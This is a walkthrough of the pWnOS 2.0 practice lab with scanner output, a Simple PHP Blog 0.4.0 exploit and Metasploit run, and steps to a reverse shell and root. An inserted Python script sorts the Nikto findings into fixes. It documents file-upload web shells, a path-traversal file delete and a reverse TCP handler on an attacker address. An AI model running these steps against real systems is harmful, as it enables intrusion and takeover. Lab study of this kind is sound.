pWnOS 2.0

Lab IP:

IP: 10.10.10.100

Information:

Nmap:

# Nmap 7.70 scan initiated Sat Jul 11 07:17:14 2020 as: nmap -v -A -oN info 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.00023s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!

Dirb:

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6004)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5753)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5037)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5395)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

Nikto:

- Nikto v2.1.6/2.1.5
+ Target Host: 10.10.10.100
+ Target Port: 80
+ GET Cookie PHPSESSID created without the httponly flag
+ GET Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ HEAD Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ GET Uncommon header 'tcn' found, with contents: list
+ GET Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ VNEMWNJD Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: GET /includes/: Directory indexing found.
+ OSVDB-3092: GET /includes/: This might be interesting...
+ GET /info/: Output from the phpinfo() function was found.
+ OSVDB-3092: GET /info/: This might be interesting...
+ OSVDB-3092: GET /login/: This might be interesting...
+ OSVDB-3092: GET /register/: This might be interesting...
+ GET /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: GET /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ GET Server may leak inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 18:48:10 2007
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ OSVDB-5292: GET /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ GET /login.php: Admin login page/section found.
  • Visit port 80
  • Found the blog directory /blog
  • Viewing the page source reveals the blog version: simple php blog 0.4.0
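Triaging the scanner findings above (the missing httponly flag and security headers, directory indexing, the exposed phpinfo() page, the outdated Apache) into a prioritised fix list, as an added example that is not part of the original walkthrough. The sample lines are constructed in the format of the Nikto output above; the rule patterns and remediation hints are my own.

```python
import re

# Constructed sample: a handful of lines in the format of the Nikto output
# shown above (not a full capture of the tool).
SCAN_OUTPUT = """\
+ GET Cookie PHPSESSID created without the httponly flag
+ GET Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ HEAD Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-3268: GET /includes/: Directory indexing found.
+ GET /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ OSVDB-3092: GET /login/: This might be interesting...
"""

# Each rule: (regex over the finding text, severity, short remediation hint).
RULES = [
    (r"without the httponly flag", "medium", "set session.cookie_httponly=1 in php.ini"),
    (r"x-powered-by header", "low", "set expose_php=Off to stop advertising the PHP version"),
    (r"X-Frame-Options header is not present", "low", "send X-Frame-Options or a CSP frame-ancestors directive"),
    (r"X-Content-Type-Options header is not set", "low", "send X-Content-Type-Options: nosniff"),
    (r"appears to be outdated", "high", "upgrade the web server to a supported release"),
    (r"Directory indexing found", "medium", "disable Indexes in the Apache Options directive"),
    (r"phpinfo\(\) function was found", "high", "remove phpinfo() test scripts from production"),
    (r"Apache default file found", "info", "remove default /icons content or block access"),
]

def triage(scan_text):
    """Map each '+' finding line to (severity, path, hint); lines matching no rule are skipped."""
    findings = []
    for line in scan_text.splitlines():
        if not line.startswith("+ "):
            continue
        # Nikto writes the path as "GET /path:"; default to "/" when there is none.
        m = re.search(r"(?:GET|HEAD) (/\S*?):", line)
        path = m.group(1) if m else "/"
        for pattern, severity, hint in RULES:
            if re.search(pattern, line):
                findings.append((severity, path, hint))
                break
    return findings

def by_severity(findings):
    """Order findings so the high-severity items come first."""
    order = {"high": 0, "medium": 1, "low": 2, "info": 3}
    return sorted(findings, key=lambda f: order[f[0]])

if __name__ == "__main__":
    for sev, path, hint in by_severity(triage(SCAN_OUTPUT)):
        print(f"[{sev:6}] {path:16} {hint}")
```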

Find exp

root@kali:~/桌面/LAB/pwnOS v2.0# searchsploit simple php blog 0.4.0
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Simple PHP Blog 0.4.0 - Multiple Remote s | exploits/php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | exploits/php/webapps/16883.rb

Another keyword

root@kali:~/桌面/LAB/pwnOS v2.0# searchsploit sphpblog
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
SPHPBlog 0.4 - 'search.php' Cross-Site Scripting | exploits/php/webapps/25423.txt
Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution | exploits/php/webapps/6311.php
Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities | exploits/php/webapps/4557.txt
Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/29051.txt

Look at 1191.pl first

		  SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________

Program : ./1191.pl
Version : v0.1
Date : 8/25/2005
Descript: This perl script demonstrates a few flaws in
SimplePHPBlog.

Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
NOT HAVE PERMISSION TO DO SO!

Please see this script comments for solution/fixes
to demonstrated vulnerabilities.
http://www.simplephpblog.com

Usage : ./1191.pl [-h host] [-e exploit]

-? : this menu
-h : host
-e : exploit
(1) : Upload cmd.php in [site]/images/
(2) : Retreive Password file (hash)
(3) : Set New User Name and Password
[NOTE - uppercase switches for exploits]
-U : user name
-P : password
(4) : Delete a System File
-F : Path and System File

Examples: ./1191.pl -h 127.0.0.1 -e 2
./1191.pl -h 127.0.0.1 -e 3 -U l33t -P l33t
./1191.pl -h 127.0.0.1 -e 4 -F ./index.php
./1191.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd
./1191.pl -h 127.0.0.1 -e 1

Then use method 1 here:

		  SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running cmd.php Upload Exploit....


Retrieved Username and Password Hash:
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: a
Password is set to: a
Logged into SimplePHPBlog at: http://10.10.10.100/blog/login_cgi.php
Current Username 'a' and Password 'a'...
Created cmd.php on your local machine.
Created reset.php on your local machine.
Created cmd.php on target host: http://10.10.10.100/blog
Created reset.php on target host: http://10.10.10.100/blog
Removed cmd.php from your local machine.
Failed to POST 'http://10.10.10.100/blog/images/reset.php': 500 Internal Server Error at ./1191.pl line 418.
Removed reset.php from your local machine.

There seems to be a problem, but visiting /images shows the file was uploaded successfully.
Then the msf version: this also failed, but it still obtained the blog account and password x4ZLwb:UD8lc5

msf5 > search sphpblog

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution


msf5 > use exploit/unix/webapp/sphpblog_file_upload
msf5 exploit(unix/webapp/sphpblog_file_upload) > show options

Module options (exploit/unix/webapp/sphpblog_file_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /sphpblog yes Sphpblog directory path
VHOST no HTTP server virtual host

msf5 exploit(unix/webapp/sphpblog_file_upload) > set RHOSTS 10.10.10.100
RHOSTS => 10.10.10.100
msf5 exploit(unix/webapp/sphpblog_file_upload) > set URI /blog
URI => /blog
msf5 exploit(unix/webapp/sphpblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.10.128:4444
[+] Successfully retrieved hash:
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as x4ZLwb:UD8lc5
[-] Error retrieving cookie!
[+] Successfully Uploaded e5pI9mmspCLu7lnToSIK.php
[+] Successfully Uploaded Vegoar2yysqdPTD7kun0.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/e5pI9mmspCLu7lnToSIK.php
[*] Calling payload: /images/Vegoar2yysqdPTD7kun0.php
[+] Successfully removed /images/Vegoar2yysqdPTD7kun0.php
[*] Exploit completed, but no session was created.

Get Limited Shell

  • Method 1
  • Use the cmd.php obtained from the first exploit to get a reverse shell
  • Method 2
  • Log into the blog with the account and password obtained from msf and upload a reverse shell at the image upload point

ROOT

  • Method 1
  • Log in via SSH as root using the database password from mysqli_connect.php under the /var directory
  • Method 2